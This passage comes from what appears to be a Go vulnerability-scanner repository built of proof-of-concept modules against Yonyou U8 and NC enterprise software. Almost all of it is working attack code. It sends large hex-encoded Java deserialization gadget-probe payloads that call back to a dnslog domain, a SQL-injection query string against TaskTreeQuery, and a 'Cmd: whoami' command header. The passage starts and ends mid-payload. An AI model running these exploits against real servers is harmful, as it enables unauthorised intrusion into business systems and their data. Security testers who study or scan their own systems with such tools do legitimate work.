793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 FileReceiveServlet反序列化漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 FileReceiveServlet反序列化漏洞存在 -> " + url) 32 | 
return 33 | } 34 | color.Red.Println("[-] 用友 FileReceiveServlet反序列化漏洞不存在") 35 | } 36 | -------------------------------------------------------------------------------- /pkg/POC/U8-TaskTreeQuery/U8-TaskTreeQuery.go: -------------------------------------------------------------------------------- 1 | package U8_TaskTreeQuery 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url = url + "/service/~iufo/nc.itf.iufo.mobilereport.task.TaskTreeQuery?usercode=1'+UNION+all+SELECT+1,db_name(),3,4,5,6,7,8,9+from+master..sysdatabases--" 21 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 22 | "User-Agent": UA, 23 | "Content-Length": "20434", 24 | "Content-Type": "application/x-www-form-urlencoded", 25 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 U8 TaskTreeQuery SQL注入漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 U8 TaskTreeQuery SQL注入漏洞存在 -> " + url) 32 | 
return 33 | } 34 | color.Red.Println("[-] 用友 U8 TaskTreeQuery SQL注入漏洞不存在") 35 | } 36 | -------------------------------------------------------------------------------- /pkg/POC/u8-LoggingConfigServlet/u8-LoggingConfigServlet.go: -------------------------------------------------------------------------------- 1 | package u8_LoggingConfigServlet 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | // https://blog.csdn.net/qq_41904294/article/details/134430713 19 | 20 | func Run(url string) { 21 | domain, session := dnslog.GetDnslogUrl() 22 | url = url + "/service/~iufo/nc.bs.logging.config.LoggingConfigServlet" 23 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 24 | "User-Agent": UA, 25 | "Content-Length": "16284", 26 | "Content-Type": "application/x-www-form-urlencoded", 27 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 28 | if err != nil { 29 | color.Red.Println("[-] 用友 U8 LoggingConfigServlet反序列化漏洞不存在") 30 | return 31 | } 32 | if dnslog.GetDnslogRecord(session) { 33 | color.Green.Println("[+] 用友 U8 LoggingConfigServlet反序列化漏洞存在 -> " + 
url) 34 | return 35 | } 36 | color.Red.Println("[-] 用友 U8 LoggingConfigServlet反序列化漏洞不存在") 37 | } 38 | -------------------------------------------------------------------------------- /pkg/POC/u8-TableInputOperServlet/u8-TableInputOperServlet.go: -------------------------------------------------------------------------------- 1 | package u8_TableInputOperServlet 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | // https://blog.csdn.net/qq_41904294/article/details/134430713 19 | 20 | func Run(url string) { 21 | domain, session := dnslog.GetDnslogUrl() 22 | url = url + "/service/~iufo/com.ufsoft.iuforeport.tableinput.TableInputOperServlet" 23 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 24 | "User-Agent": UA, 25 | "Content-Length": "20327", 26 | "Content-Type": "application/x-www-form-urlencoded", 27 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 28 | if err != nil { 29 | color.Red.Println("[-] 用友 U8 TableInputOperServlet反序列化漏洞不存在") 30 | return 31 | } 32 | if dnslog.GetDnslogRecord(session) { 33 | color.Green.Println("[+] 用友 U8 TableInputOperServlet反序列化漏洞存在 -> " 
+ url) 34 | return 35 | } 36 | color.Red.Println("[-] 用友 U8 TableInputOperServlet反序列化漏洞不存在") 37 | } 38 | -------------------------------------------------------------------------------- /pkg/POC/NC-JiuQiClientReqDispatch/NC-JiuQiClientReqDispatch.go: -------------------------------------------------------------------------------- 1 | package NC_JiuQiClientReqDispatch 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | //https://blog.csdn.net/qq_41904294/article/details/134818872?spm=1001.2014.3001.5502 19 | 20 | func Run(url string) { 21 | domain, session := dnslog.GetDnslogUrl() 22 | url = url + "/servlet/~ic/com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch" 23 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 24 | "User-Agent": UA, 25 | "Cmd": "whoami", 26 | "Content-Length": "20434", 27 | "Content-Type": "application/x-www-form-urlencoded", 28 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", 